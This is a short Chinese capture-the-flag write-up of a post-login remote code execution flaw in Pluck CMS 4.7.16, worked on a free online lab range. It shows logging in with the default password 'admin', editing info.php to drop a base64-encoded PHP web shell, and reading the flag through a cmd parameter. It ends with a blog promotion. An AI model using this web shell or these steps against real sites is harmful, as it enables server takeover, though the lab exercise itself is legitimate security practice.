
是一个CMS系统----Pluck-CMS-Pluck-4.7.16 的后台RCE漏洞。
本人使用春秋云境免费靶场在线搭建。

admin,果然跳转到了登录页面,只有密码框,输入admin,登录成功,惊呆了老铁!!!



info.php。修改info.php代码。<?php
file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8+'));
?>PHP
file_put_contents() 是 PHP 中的一个函数,用于将一个字符串写入文件中。

shell.php文件,cmd参数传入cat /falg获取falg。http://eci-2ze55xp3m6rd9j75pecz.cloudeci1.ichunqiu.com/shell.php?cmd=cat%20/flagOther
我加入了腾讯云自媒体分享计划,可以获取到腾讯云周边、技术书籍、线下沙龙、云服务器优惠等等。
我的博客即将同步至腾讯云开发者社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=1f93zvim5fqci